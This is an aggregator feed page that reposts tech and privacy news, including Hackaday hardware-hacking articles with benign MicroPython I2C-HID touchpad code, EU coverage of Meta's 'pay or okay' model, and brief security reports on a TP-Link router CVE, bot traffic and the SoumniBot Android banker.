

🍀 ThePrivacyPost is a service account managed directly by the Poliverso administrators; it publishes news from various sites, blogs and fediverse accounts, along with some original content.


Hacked Oscilloscope Plays Breakout, Hints at More
https://poliverso.org/display/0477a01e-a4369873-de12095a735cd022

You know things are getting real when the Dremel is one of the first tools you turn to after unboxing your new oscilloscope. But when your goal is to hack the scope to play Breakout, sometimes plastic needs to be sacrificed.

Granted, the scope in question, a Fnirsi DSO152, only cost [David Given] from Poking Technology a couple of bucks. And while the little instrument really isn’t that bad inside, it’s limited to a single channel and 200 kHz of bandwidth, so it’s not exactly lab quality. The big attractions for [David] were the CH32F103 microcontroller and the prominent debug port inside, not to mention the large color LCD panel.

[David]’s attack began with the debug port and case mods to allow access, but quickly ground to a halt when he accidentally erased the original firmware. But no matter — tracing out the pins is always an option. [David] made that easier by overlaying large photos of both sides of the board, which let him figure out which buttons went to which pins, and mapping for the display’s parallel interface. He didn’t mess with any of the analog stuff except to create a quick “Hello, oscilloscope!” program to output a square wave to the calibration pin. He did, however, create a display driver and port a game of breakout to the scope — video after the hop.

We’ve been seeing a lot of buzz around the CH32xx MCUs lately; seeing it start to show up in retail products is perhaps a leading indicator of where the cheap RISC chips are headed. We’ve seen a few interesting hacks with them, but we’ve also heard tell they can be hard to come by. Maybe getting one of these scopes to tear apart can fix that, though.

https://www.youtube.com/embed/VYZcPrOuGKg?feature=oembed

Thanks to [Bike Forever] for the heads up on this one.




Two New Apple and Google Platform Privacy Requirements Kicking In Now
https://fpf.org/blog/two-new-apple-and-google-platform-privacy-requirements-kicking-in-now/
@privacy
Apple’s important mandatory requirements affecting iOS apps are about to kick in, and Google’s new requirements for publishers and advertisers have just gone into effect. Accurately implementing these requirements calls for close cooperation between the legal, privacy, and ad ops teams. Apple’s Privacy Manifests At



In the latest #EDRigram, we draw your attention to:

🇬🇷 Record-high #GDPR fine for Greece's Migration Ministry
🇪🇺 @europarl_en vote in favour of discriminatory #MigrationPack
💰Meta's harmful push to charge for privacy
& more!

Read up & share: https://edri.org/our-work/edri-gram-17-april-2024/



💡 #FreeSoftware licences are helpful for many, many reasons. For example, they enable independent developers to use or reuse existing software, and implement it in their projects! 😍

‼️ The #FSFE has developed #REUSE, both a tool and a specification to make Free Software licensing easy for humans and machines alike. 💕

ℹ️ https://reuse.software



Source Code to the 1999 FPS Game Descent 3 Released
https://poliverso.org/display/0477a01e-946b71be-4215280fb7f640e0

On April 16th of this year, [Kevin Bentley] released the source code to the Sci-Fi FPS game Descent 3. Originally released in 1999 for Windows, it was the third part in the Descent series, following right after the events of Descent 2. In the game, you control a flying ship which you have to guide through both in- and outdoor environments, while shooting at robots that have been infected with an alien virus as you try to save the solar system. It was later also ported to Mac OS and Linux, but was considered a commercial flop due to low sales.

As one of the original developers, [Kevin] explains that one of the goals of this code release is to give the game a second life, by cleaning up the C++ code and using new APIs. Original proprietary audio and video libraries from Interplay were removed, which means that some work is required before one can build a fresh copy of new Descent 3 from this code base. That said, the released code is the latest 1.5 patch level, with the Mac OS and Linux support. Even if the original Descent games weren’t your cup of tea, it’s still great to see games being preserved and updated like this.

Thanks to [Phil Ashby] for the tip.




FLOSS Weekly Episode 779: Errata Prevention Specialist
https://poliverso.org/display/0477a01e-fdd422e1-dc42b75e01d1b0d6

This week Jonathan Bennett and Dan Lynch sit down with Andy Stewart to talk about Andy’s Ham Radio Linux (AHRL)! It’s the Linux distro designed to give hams the tools they need to work with their radios. What’s it like to run a niche Linux distro? How has Andy managed to keep up with this for over a decade? And what’s the big announcement about the project breaking today?


Did you know you can watch the live recording of the show right in the Hackaday Discord? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Next week we’re taping the show on Tuesday, and looking for a guest!

https://play.libsyn.com/embed/episode/id/30874658/height/192/theme/modern/size/large/thumbnail/yes/custom-color/fcab1c/time-start/00:00:00/hide-playlist/yes/download/yes/font-color/271b04

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.



This Go-Kart Rides on a Pallet
https://poliverso.org/display/0477a01e-df2163d3-2022d98fd8201579

Many beginner woodworkers, looking to offset the introductory costs of starting a hobby, will source their wood from pallets. Generally they’re easily found and can be low or no cost, but typically require a bit of work before they’re usable in a project. [Garage Avenger] is looking to do something a little outside of the box with his pallet project, though. He’s using raw pallets as a chassis for a four-speed go-kart, partially for the challenge and excitement and also to one-up a Pinterest post.

Almost immediately, though, the other major downside of working with pallets arose, which is that they’re generally built out of low-grade pine, which is soft and flexible. Flexibility is generally not a good thing to have in a vehicle frame, so plenty of the important parts of this build were strengthened with steel tubing including the rear axle, steering mounts, and a few longitudinal supports to strengthen the overall frame. After working out some kinks with ordering a few of the wrong parts, and mounting the steering box backwards, it was time to test out the four-speed engine (and brakes) on the go-kart, making it nearly ready for the road.

To complete the build, some tidying of wiring and fuel lines was done, along with improving some of the non-critical parts of the build like the bucket seat. Of course, adding pallet spoilers and body kit puts the finishing touches on the build and the go-kart is finally ready to tear up the local go-kart track and the less-inspiring Pinterest projects. [Garage Avenger] is no stranger to strange vehicle builds, either. Although it’s a bit out of season for most of our northern hemisphere readers now, his jet-powered street sled is still worth a view.

https://www.youtube.com/embed/b3XqcfVq5bE?feature=oembed




Compiling and Running Turbo Pascal in the Browser
https://poliverso.org/display/0477a01e-bdf87362-b4f5d1183d700f59

When a friend of [Lawrence Kesteloot] found a stack of 3.5″ floppy disks, they found that it contained Turbo Pascal code which the two of them had worked on back in the Summer of 1989. Amidst reminiscing about the High School days and watching movies on VHS, [Lawrence] sought a way to bring these graphical applications once more back to life. Not finding an easy way to compile Turbo Pascal code on Mac even back in 2013 when he started the project, he ended up writing a Turbo Pascal compiler in JavaScript, as any reasonable person would do in this situation.
SPIDER.PAS in its full glory. (Credit: Lawrence Kesteloot)
As noted by [Lawrence], the compiler doesn’t implement the full Turbo Pascal 5.5 language, but only the subset that was required to compile and run these applications which they had found on the floppy disks. These include ROSE.PAS and SPIDER.PAS along with three others, and can also be found in the GitHub repository. As can be seen in the online version of the compiler, it captures the feel of programming Pascal in 1989 on the command line.

Naturally, the software situation has changed somewhat over the last decade. We’ve recently seen some promising multi-platform Pascal compilers, and of course you could even run Turbo Pascal in DOSBox or similar. That might make this project seem irrelevant, but being able to write and run Pascal applications in more ways and on more platforms is never a bad thing.




VCF East 2024 Was Bigger and Better Than Ever
https://poliverso.org/display/0477a01e-1b1a21cc-fbef3d7b242b0e4f

I knew something had changed before I even paid for my ticket to this year’s Vintage Computer Festival East at the InfoAge Science and History Museum in Wall, New Jersey.

Over the last couple of years, attendance has been growing to the point that parking in the lot directly next to the main entrance has been reserved for only the earliest of risers. That hasn’t described yours truly since the days when I still had what my wife refers to as a “real job”, so that’s meant parking in the overflow lot down the road and walking the half a mile or so back to the main gate. Penance for working on the Internet, let’s call it.

But this time, while walking along the fence that surrounds the sprawling InfoAge campus, I came across an open gate and a volunteer selling tickets. When commenting to her that this was a pleasant surprise compared to the march I’d anticipated, she responded that there had been so many people trying to get into the main entrance that morning that they decided to station her out here to handle the overflow.

I was a few steps past her table and into InfoAge before the implications of this interaction really hit me. Two entrances. How many attendees does there need to be before you set up a secondary ticket booth out by the reserve parking lot just to keep things moving smoothly? Well, I can’t tell you what the exact number is. But after spending the rest of the day walking between all the buildings it took to contain all of the exhibits, talks, and activities this year, I can tell you it’s however many people came to VCF East 2024.

Compared to its relatively humble beginnings, it’s incredible to see what this event has grown into. InfoAge was packed to the rafters, and despite what you might think about a festival celebrating decades old computing hardware, there were plenty of young faces in the crowd. I’m not sure exactly what’s changed, but the whole place was positively jumping. Perhaps it’s partially the generational nostalgia that’s kept Netflix cranking out new seasons of the 1980’s set Stranger Things. I’m sure attention (and attendance) from several well known YouTube personalities have played a big part as well.

Whatever the magic formula that’s turned what was once a somewhat somber retrospective on early desktop computers into a major destination for tech lovers, I’m all for it. Long Live the Vintage Computer Festival!

A Few of My Favorite Things


I’ve only rarely been confused with Julie Andrews, but I’ll do my best here to catalog some of my personal highlights from VCF East 2024.

This is in no way meant to be a comprehensive view of what was on hand over the weekend. I can’t stress enough how absolutely impossible of a task it would be to accurately record everything that was on display — and that’s not including the talks and classes that were happening at the same time. If you’re even remotely interested in vintage computing or rare and unusual tech, this is an event you absolutely need to see for yourself to truly appreciate.

COSMAC Elves on the Shelves


First described in a series of Popular Electronics articles in the back-half of the 1970s, the Elf was a simple homebrew computer based on the RCA 1802 Complementary Symmetry Monolithic Array Computer (COSMAC) chip. In the boilerplate configuration, it used a pair of LED hexadecimal displays for output and eight toggle switches for input. There was no ROM — programs were entered directly into memory using the toggle switches as God intended.

Different kit versions of the computer were sold over the years, and the community has produced countless spin-offs of the basic concept right up to the present day. For their exhibit RCA COSMAC 1802 Computers, Josh Bensadon and Walter Miraglia had a wide collection of these DIY machines on display, as well as a few commercial devices that used the 1802 such as the RCA Studio II.

Modern Art on Vintage Hardware


Although there’s a canvas print of one of Joe Kim’s pieces on the wall in my office, I wouldn’t say that I’m much of an art guy. But there was something about The Plot Thickens: Pen Plotter History and Artistry that I found fascinating. Paul Rickard was demonstrating how he uses modern Python code to generate algorithmic art which he then puts on paper with vintage plotters — machines he lovingly refers to on his website as “absurd and inefficient” in all the right ways.

Crank-Loaded Software


As the name implies, the exhibit 80’s Luggables was intended to show off various mobile computers from the pre-laptop days, such as the Osborne Executive. But honestly, I thought the inclusion of an Altair 8800 and Macintosh SE muddied the waters a bit. Granted the Mac, with its handle and integrated display, might be on the borderline. But the Altair? If that’s portable, then pretty much every other computer ever made must be as well.

That being said, the Altair ended up being perhaps the most interesting piece of the exhibit, as it was fitted with a modern crank-operated paper tape reader. Attendees were able to toggle in the appropriate settings for the Altair’s Multi-Boot Loader (MBL) PROM, crank the tape through the reader, and then enjoy the fruits of their labor by playing the loaded game through the Osborne Executive that was acting as a serial terminal.
It was the sort of hands-on interaction with vintage hardware that you really only get to experience at an event like VCF, and many attendees walked away from their first experience loading software from paper tape with a much greater appreciation for the modern USB flash drive.

Towers of Power


TRS-80 Model II Boards Collection was a simple exhibit, but it certainly caught the eye. Pete Cetinski took 28 different expansion boards (apparently a near-complete set) for Tandy’s classic machine, mounted each one next to a typed up description of what it does, and had them out for display. There was also a Model 16 with the lid off so attendees could better visualize how these boards would have been installed.

The Internet As it Once Was


As somebody who fights works with modern web technology on a daily basis, The Serial Port by Ben Grubbs definitely hit on a personal level. This exhibit was really in two parts — one half was showing off a Cobalt RaQ web server appliance from the 1990s, but a few steps away there was a desktop running an era appropriate version of Microsoft FrontPage that let you bang out a simple web page that would be served up from the RaQ.
This gave attendees a chance to experience what it was like on both sides of the fence back in the days when we thought flashing marquees were a neat idea. Another excellent interactive setup that was getting a lot of attention, especially from some of the younger folks who may not have even been alive when such simplistic sites ruled the net.

The Tip of a Vintage Iceberg


As I said before, there’s simply no way to do an event like Vintage Computer Festival East justice with a post like this. The exhibits took up four separate rooms spread out among multiple rooms, and the consignment area was even larger and more popular than last year.

Instead, consider this post something of a barometer for VCF — and perhaps the larger vintage computing community as a whole. If you had any concerns about this particular technological niche fading away into obscurity, I can give you from my first-hand experience that not only is it alive and well, but it’s growing into something truly remarkable.




EU data protection body says Meta’s ‘pay or OK’ model is not OK
https://poliverso.org/display/0477a01e-dd1cf63c-e5fa68ada7acd8d0


The European Data Protection Board opposed Meta's controversial "pay or okay" business model in an opinion published on Wednesday (17 April), saying this binary approach was not compliant with the EU's data privacy rules.


https://www.euractiv.com/section/platforms/news/eu-data-protection-body-says-metas-pay-or-ok-model-is-not-ok/




Letta’s report aligns with views of major telecoms on market integration
https://poliverso.org/display/0477a01e-2137ea19-7d4e160aafff8a6a


Laying out his vision of a harmonised single market in the telecommunications sector, former Italian prime minister Enrico Letta aligned with some of the talking points by the EU's largest telecom players, according to a draft report seen by Euractiv.


https://www.euractiv.com/section/digital/news/lettas-report-aligns-with-views-of-major-telecoms-on-market-integration/




TP-Link Routers Are Caught in the Crossfire of DDoS Attacks
https://poliverso.org/display/0477a01e-e8cc89f2-74b118e201ae0e49

Fortinet reports that attackers continue to exploit a year-old vulnerability in TP-Link routers, adding the routers to various botnets used to carry out DDoS attacks.

The command injection vulnerability CVE-2023-1389 (CVSS score: 8.8) was discovered in December 2022 at the Pwn2Own event in Toronto and fixed in March 2023.

The bug affects the popular TP-Link Archer AX21 model, which has long been in the sights of botnet operators.

Fortinet has observed numerous attacks exploiting this security flaw, including the Mirai and Condi botnet malware. The malicious code lets hackers take control of devices in order to launch DDoS attacks.
Fortinet telemetry
In April 2023 it emerged that cybercriminals had taken advantage of the same vulnerability to attack TP-Link routers located mainly in Eastern Europe and add them to the Mirai botnet.

Experts urge users to stay vigilant against DDoS botnets and to apply patches promptly, to protect their network environment from infection and keep their routers from becoming bots.

The article "TP-Link Routers Are Caught in the Crossfire of DDoS Attacks" comes from il blog della sicurezza informatica.





Human-Interfacing Devices: HID over I2C
https://poliverso.org/display/0477a01e-95938951-19d90b0f2c178566

In the previous two HID articles, we talked about stealing HID descriptors, learned about a number of cool tools you can use for HID hacking on Linux, and created a touchscreen device. This time, let’s talk about an underappreciated HID standard, but one that you might be using right now as you’re reading this article – I2C-HID, or HID over I2C.

HID as a protocol can be tunneled over many different channels. If you’ve used a Bluetooth keyboard, for instance, you’ve used tunneled HID. For about ten years now, I2C-HID has been heavily present in the laptop space; it was initially used in touchpads, later in touchscreens, and now also in sensor hubs. Yes, you can expose sensor data over HID, and if you have a clamshell (foldable) laptop, that’s how the rotation-determining accelerometer exposes its data to your OS.

This capacitive touchscreen controller is not I2C-HID, even though it is I2C. By [Raymond Spekking], CC-BY-SA 4.0

Not every I2C-connected input device is I2C-HID. For instance, if you’ve seen older tablets with I2C-connected touchscreens, don’t get your hopes up, as they likely don’t use HID – it’s just a complex-ish I2C device, with enough proprietary registers and commands to drive you crazy even if your logic analysis skills are on point. I2C-HID is nowhere near that, and it’s also way better than the PS/2 we used before – an x86-only interface with limited capabilities, already almost extinct from even x86 boards, and further threatened in this increasingly RISCy world. I2C-HID is low-power, especially compared to USB, as capable as HID goes, compatible with existing HID software, and ubiquitous enough that you surely already have an I2C port available on your SBC.

In the modern world of input devices, I2C-HID is spreading, and the coolest thing is that it’s standardized. The standardization means a lot of great things for us hackers. For one, unlike all of those I2C touchscreen controllers, HID-I2C devices are easier to reuse; as much as information on them might be lacking at the moment, that’s what we’re combating right now as we speak! If you are using a recent laptop, the touchpad is most likely I2C-HID. Today, let’s take a look at converting one of those touchpads to USB HID.

A Hackable Platform

Two years ago, I developed a Framework laptop input cover controller board. Back then, I knew some things about I2C-HID, but not too much, and it kinda intimidated me. Still, I wired up the I2C pins to an I2C port on an RP2040, wired up the INT pin to a GPIO, successfully detected an I2C device on those I2C pins with a single line of MicroPython code, and left it sitting on my desk out of dread over converting touchpad data into mouse events – as it turns out, it was way simpler than I thought.

There’s a specification from Microsoft, and it might be your first jumping point. I tried reading the specification, but I didn’t understand HID at the time either, so that didn’t help much. Looking back, the specification is pretty hard to read, regardless. Here’s the deal in the real world.

If you want to get the HID descriptor from an I2C-HID device, you only need to read a block of data from its registers. Receiving reports (HID event packets) is simple, too. When the INT pin goes low, read a block of data from the device – you will receive a HID report. If there’s an RST pin, you will want to bring it down upon bootup for a few hundred milliseconds to reset the device, and you can use it in case your I2C-HID device malfunctions, too.

Now, there are malfunctions, and there definitely will be quirks. Since HID is ubiquitous, there are myriad ways for manufacturers to abuse it. For instance, touchpads are so ubiquitous that Chrome OS has entire layers dealing with their quirks. But here we are, and I have an I2C device connected to an RP2040, previous MicroPython I2C work in hand, some LA captures between the touchpad and the original system stashed away, and I’m ready to send it all commands it needs.

Poking And Probing


To read the descriptor, you can read a block from register 0x20, where the first four bytes define the descriptor version and the descriptor length – counting these four bytes in. When we put this descriptor into the decoder, we will get something like this:

[...]
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x05, // Usage (Touch Pad)
0xA1, 0x01, // Collection (Application)
0x85, 0x01, // Report ID (1)
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x22, // Usage (Finger)
0xA1, 0x02, // Collection (Logical)
0x09, 0x47, // Usage (Confidence)
0x09, 0x42, // Usage (Tip Switch)
0x15, 0x00, // Logical Minimum (0)
0x25, 0x01, // Logical Maximum (1)
[...]

That is a HID descriptor for a touchpad alright! Save this descriptor somewhere – while getting it dynamically is tempting, hardcoding it into your firmware also might be a viable decision, depending on which kind of firmware you’ll be adding I2C-HID support into, and, you’ll really want to have it handy as a reference. Put this descriptor into our favourite decoder website, and off we go! Oh, and if you can’t extract the descriptor from the touchpad for whatever reason, you can get it from inside a running OS like I’ve done in the last article – that’s what I ended up doing, because I couldn’t make MicroPython fetch the descriptor properly.
For some reason, Microsoft decided to distribute this spec as a .docx file, something that I immediately abused as a way of stress relief.
Take a look at the report IDs – they can be helpful later. All reports coming from the touchpad will have their report ID attached, and it’s good to know just which kinds of events you can actually expect. Also, here’s a challenge – try to spot the reports used for BIOS “simple mouse” functionality, firmware update, touchpad calibration, and any proprietary features!

Now, all that’s left is getting the reports. This is simple too – you don’t even need to read a block from a register, just a block of data from the touchpad. First, you read a single byte, which tells you how many more bytes you need to read to get the actual packet. Then you read a byte once INT is asserted (set low). That means the touchpad has data for you. If your INT doesn’t work for some reason, as it was on my board, you could continuously poll the touchpad in a loop instead, reading a single byte each time, and reading out a full packet when the first byte isn’t 0x00. Then, it’s the usual deal – first byte is the report ID, and all other bytes are the actual report contents. For I2C code of the kind that our last article uses, reading a report works like this:
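from time import sleep

# `i2c` and `usb_hid` are the objects set up by the code from the last article
while True:
    try:
        # the first byte tells us how many bytes the pending packet has (0 = nothing yet)
        l = i2c.readfrom(0x2c, 1)[0]
        if l:
            d = i2c.readfrom(0x2c, l)
            if d[2] != 0x01:
                # only forward packets with a specific report ID, discard all others
                print("WARNING")
                print(l, d)
                print("WARNING")
            else:
                d = d[3:]
                print(l, len(d), d)
                usb_hid.report(usb_hid.MOUSE_ABS, d)
    except OSError:
        # touchpad unplugged? retry in a bit
        sleep(0.01)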

Now, touch the touchpad, and see. Got a report? Wonderful! Haven’t received anything yet? There are a few things to check. First, your touchpad might require a TP_EN pin to be asserted low or high. Also, if your touchpad has a TP_RST pin, you might need to pull it low on startup for a couple hundred milliseconds. Other than that, if your touchpad is from a reasonably popular laptop, see if there’s any references for its quirks in the Linux kernel, or any of the open firmwares out there.
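A stricter way to split one raw read into report ID and payload, as an added example rather than code from the original article: it treats the length field as the two-byte little-endian value the I2C-HID specification defines and checks it before slicing, so a misbehaving touchpad cannot push an oversized or truncated packet to the USB side. The `max_input_len` and `expected_ids` parameters and the sample frames are assumptions constructed for illustration.

```python
import struct


class FrameError(ValueError):
    """The bytes read from the device do not form a usable input report."""


def parse_input_frame(buf, max_input_len, expected_ids):
    """Return (report_id, payload) for one raw I2C-HID read, or None when idle.

    buf            -- bytes read from the device, length field included
    max_input_len  -- largest frame we are willing to accept (assumed known,
                      e.g. from the saved descriptor data)
    expected_ids   -- report IDs seen in the saved report descriptor
    """
    if len(buf) < 2:
        raise FrameError("short read: no length field")
    (length,) = struct.unpack_from("<H", buf, 0)   # length counts its own 2 bytes
    if length == 0:
        # Nothing to forward; the polling loop on the page treats a zero
        # first byte the same way.
        return None
    if length < 3:
        raise FrameError("length %d cannot hold a report ID" % length)
    if length > max_input_len:
        raise FrameError("length %d exceeds limit %d" % (length, max_input_len))
    if length > len(buf):
        raise FrameError("frame claims %d bytes, only %d read" % (length, len(buf)))
    report_id = buf[2]
    if report_id not in expected_ids:
        raise FrameError("unexpected report ID 0x%02x" % report_id)
    # Slice by the declared length so padding after the frame is dropped.
    return report_id, bytes(buf[3:length])


# Constructed sample reads (not captured from real hardware).
SAMPLE_READS = [
    bytes([0x07, 0x00, 0x01, 0x03, 0x10, 0x00, 0x20, 0xFF, 0xFF]),  # valid, padded
    bytes([0x00, 0x00]),                                            # idle
    bytes([0x40, 0x00, 0x01, 0x00]),                                # length too big
    bytes([0x07, 0x00, 0x01, 0x03, 0x10]),                          # truncated
    bytes([0x05, 0x00, 0x09, 0xAA, 0xBB]),                          # unknown report ID
]


def demo():
    """Classify every sample read as 'report', 'idle' or 'rejected'."""
    results = []
    for raw in SAMPLE_READS:
        try:
            parsed = parse_input_frame(raw, max_input_len=32, expected_ids={0x01})
            results.append("idle" if parsed is None else "report")
        except FrameError:
            results.append("rejected")
    return results


if __name__ == "__main__":
    print(demo())
```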

Further Integration


Theoretically, you could write a pretty universal I2C-HID to USB-HID converter seriously easily – that would allow things like USB-connected touchpads on the cheap, just like some people have been doing with PS/2 in the good old days. For me, there’s an interesting question – how do you actually integrate this into a keyboard firmware? There are a few options. For instance, you could write a QMK module for dealing with any sort of I2C-HID device, that’d pass through reports from the touchpad and generate its own reports for keyboard reports. That is a viable option for most of you; for me, C++ is not my friend as much as I’d like it to be.

There’s the MicroPython option we’ve explored last article, and that’s what I’m using for forwarding at the moment. This option needs the descriptor translated into TUSB macros, which took a bit of time, but I could make it work. Soon, USB device support will be added into the new MicroPython release, which will make my translation work obsolete in all the best ways, but it isn’t merged just yet. More importantly, however, there’s no stock keyboard code I could find that’s compatible with this firmware, and as much as it could be educational, I’m not looking into writing my own keyboard scanning code.

Currently, I’m looking into a third option, KMK. A CircuitPython-based keyboard firmware, it should allow things like dynamic descriptor definitions, which lets us save a fair bit of time when iterating on descriptor hacking, especially compared to the MicroPython fork.

All of these options need you to merge keyboard and touchpad descriptors into one, which makes sense. The only caveat is the question of conflicting report IDs between the stock firmware keyboard descriptor and the stock touchpad descriptor. For fixing that, you’d want to rewrite report IDs on the fly – not that it’s complicated, just a single byte substitution, but it’s a good caveat to keep in mind! My touchpad code already does this because the library does automatic report ID insertion, but if yours doesn’t, make sure they’re changed.
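The packet framing and the on-the-fly report ID rewrite described above can be kept in two small pure functions that also refuse frames whose device-supplied length does not match what was read. This is an added example, not the article's code: the names `parse_input_report` and `to_usb_report`, the ID mapping and the sample frames are constructed, and the layout (2-byte little-endian length that counts itself, then report ID, then data) is assumed from the indices the loop above uses.

```python
def parse_input_report(frame):
    """Split one I2C-HID input frame into (report_id, payload).

    Assumed layout: bytes 0-1 are a little-endian length that includes
    the length field itself, byte 2 is the report ID, the rest is data.
    Returns None when the length field is zero (no report pending).
    """
    if len(frame) < 2:
        raise ValueError("frame shorter than its length field")
    length = frame[0] | (frame[1] << 8)
    if length == 0:
        return None
    if length < 3:
        raise ValueError("length %d leaves no room for a report ID" % length)
    if length > len(frame):
        # never trust the peripheral's length beyond what was actually read
        raise ValueError("device claims %d bytes, only %d were read"
                         % (length, len(frame)))
    return frame[2], bytes(frame[3:length])


def to_usb_report(frame, id_map):
    """Return the bytes to send over USB, or None if the frame is dropped.

    id_map maps touchpad report IDs to the IDs used in the merged
    keyboard+touchpad descriptor; IDs missing from the map are discarded,
    which mirrors the "forward one report ID only" filter in the loop.
    """
    parsed = parse_input_report(frame)
    if parsed is None:
        return None
    report_id, payload = parsed
    if report_id not in id_map:
        return None
    return bytes([id_map[report_id]]) + payload


if __name__ == "__main__":
    # Constructed frame: length 7, report ID 0x01, four data bytes.
    sample = bytes([0x07, 0x00, 0x01, 0x10, 0x20, 0x30, 0x40])
    # Hypothetical mapping: touchpad ID 0x01 collides with the keyboard,
    # so it is published as 0x05 in the merged descriptor.
    print(to_usb_report(sample, {0x01: 0x05}))
```

If your USB library inserts the report ID itself, as the author's does, pass it only the payload and the mapped ID instead of the concatenated bytes.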

Even Easier Reuse


Now, all of this was about tunneling I2C-HID-obtained HID events into USB. Are you using something like a Raspberry Pi? Good news! There’s i2c-hid support in Linux kernel, which only really wants the IRQ GPIO and the I2C address of your I2C device. Basically, all you need to do is to add a device tree fragment and some very minimal data. I don’t have a tutorial for this, but there’s some initial documentation in the kernel tree, and grepping the device tree directory for the overlay name alone should give you a wonderful start.

This article isn’t long, and that’s because of just how easy I2C-HID is to work with. Now, of course, there are quirks – just check out this file for some examples. Still, it’s nothing that you couldn’t figure out with a logic analyzer, and now you can see just how easy this is. I hope that this can help you on your hacking forays, so whenever you next see a laptop touchpad, you know just how easy they can be to wire up, no matter if you’re using a microcontroller or a Raspberry Pi.


Custom Dog Door Prevents Culinary Atrocities
https://poliverso.org/display/0477a01e-3e79ba15-dab17fe37574fe8f

Riley, an 8 lb pug, has more beauty than brains, and a palate as unrefined as crude oil. While we hate criticizing others’ interests and tastes, his penchant for eating cat poop needed to stop. After a thorough exploration of a variety of options, including cat food additives that make its excrement taste worse (HOW? WHY? Clearly taste wasn’t the issue!), automatic litter boxes that stow the secretions, and pet doors that authenticate access to the room with the litter box, [Science Buddies] eventually settled on a solution that was amenable to all members of the family.

The trick was in creating a door mechanism with a blacklist of sorts rather than a whitelist. As the cat didn’t like to push the door open itself, the solution needed to have the pet door open by default. A magnet on Riley’s collar would trip a sensor attached to an Arduino that would control servos to swing the door shut immediately if he attempted to access the defecated delights. Of course safety was a consideration with the door swinging in Riley’s face.

We’ve covered a few pet screeners, including one for the same purpose that used IR sensors (but a much bigger dog also named Riley), and a flock of solutions for chickens. We’ve also seen [Science Buddies] in previous posts, so they’re not on the tips line blacklist.

https://www.youtube.com/embed/Djzx54j-2ZU?feature=oembed


Bot Forever! Half of web traffic is fake. Bots will soon be the masters of the internet
https://poliverso.org/display/0477a01e-dc78fabd-c0e3d6c9f153c1d7

According to the annual Imperva Bad Bot report from Thales, almost half (49.6%) of all Internet traffic in 2023 came from bot activity. That is 2% more than a year earlier and the highest figure since 2013. https://www.securitylab.ru/glossary/thales/

Particularly worrying is the fact that malicious bot traffic grew to 32% of the total, while the share of real users is steadily declining. This trend is having a negative impact on organizations around the world and is estimated to cost billions of dollars every year because of attacks on websites, APIs and various applications.

Which bots are to blame


The most common type of malicious bots are specialized programs that perform specific tasks with criminal intent, such as assisting in cybercrime, theft or fraud campaigns. Particularly high levels of their activity were recorded in Ireland, Germany and Mexico, while the United States saw only a slight increase.

According to the report, the development of technologies, including generative artificial intelligence, has contributed to the growth of simple bots: their share rose from 33% in 2022 to 39% in 2023. In addition, the algorithms become more sophisticated over time.

For example, in 2023, 44% of all malicious bot traffic came from programs disguised as mobile users. Such tools typically use residential and mobile proxies to hide their true origins and avoid detection.

The report also documents the rise of more advanced bots capable of imitating the behaviour of real people and of successfully bypassing security measures. In most cases they targeted the legal, government, entertainment and financial services sectors.

Bots will soon surpass human-generated traffic


Separately, it is worth noting the growth of account takeover (ATO) attacks, which became 10% more frequent. Almost half of these incidents were directed against APIs. The most frequent victims were companies in the financial, tourism and economic sectors.

“Automated bots will soon surpass the share of Internet traffic coming from humans, radically changing the way organizations build and protect their web resources,” warns Nanhi Singh, general manager of application security at Imperva.

To counter the growing threat, organizations need to be more vigilant and implement effective defences, in particular against API abuse attacks that can lead to account compromise and data theft.

The article “Bot Forever! Half of web traffic is fake. Bots will soon be the masters of the internet” comes from il blog della sicurezza informatica.


What are the responsibilities and liabilities of #FreeSoftware developers?
🚨 A potential threat to Free Software developers looms in the form of an ongoing lawsuit in the UK involving Bitcoin and its core developers.

https://fsfe.org/news/2024/news-20240417-01.html

#SoftwareFreedom #Bitcoin #BitcoinCase

Getting Started with Radio Astronomy
https://poliverso.org/display/0477a01e-f5c2927d-7e3827149e9b9a1a

There are many facets to being a radio hobbyist, but if you’ve ever had the urge to dabble in radio astronomy, check out “The Novice’s Guide to Amateur Radio Astronomy,” a presentation at the 2024 conference of the Society of Amateur Radio Astronomers. In that presentation (see the video below), [Nathan Butts] covers everything from why you should take up the hobby, how to set up a software defined radio (SDR) receiver, and how to repurpose old computers. This is just one of a series of videos recently posted from the conference — check out their channel to see them all.

Unlike optical astronomy, you can listen to the universe by radio during the day or night, rain or shine. You don’t need a dark sky, although these days, a quiet radio location might be hard to find. [Nathan] also points out that some people just want to crunch data collected by others, and that’s fun, too. There are many ways to get involved from designing hardware, writing software, or — of course — just listening.

It has never been easier to get involved. Cheap software-defined radios are perfect for this sort of work, and we all have massive computers and scores of small data-collection computers. Maybe you’ll be the next person to hear a Wow signal. If you are worried about fielding an antenna, many people repurpose satellite dishes.

https://www.youtube.com/embed/uz15GmR_aXc?feature=oembed


European space industry needs a single market approach, recommends Letta report
https://poliverso.org/display/0477a01e-f4cde9b4-e12ff906ce02745b

The EU space market should be integrated, because the European space industry is no longer adequate to compete in the current global space economy, Italian MP Enrico Letta writes in his draft full report as seen by Euractiv.


https://www.euractiv.com/section/industrial-strategy/news/european-space-industry-needs-a-single-market-approach-recommends-letta-report/


🥳WIN: Today, @eu_edpb heard civil society's voices to stand up for people's right to have control over their data.

@POLITICOEurope reports: EDPB opposed #Meta plan to charge for privacy. #PayorOkay

EDRi's Policy Advisor @itxaso explains why privacy is not for sale for @euronews: https://www.euronews.com/next/2024/04/15/meta-must-stop-charging-for-peoples-right-to-privacy

EDPB Opinion: Meta cannot rely on "Pay or Okay"
First update on the EDPB "pay or okay" opinion on the largest platforms.
ms, 16 April 2024
Meta


https://noyb.eu/it/statement-edpb-pay-or-okay-opinion


SoumniBot: the new Android banker’s unique techniques
https://poliverso.org/display/0477a01e-3dca6bec-de11670c9ba46f23

The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.

SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure


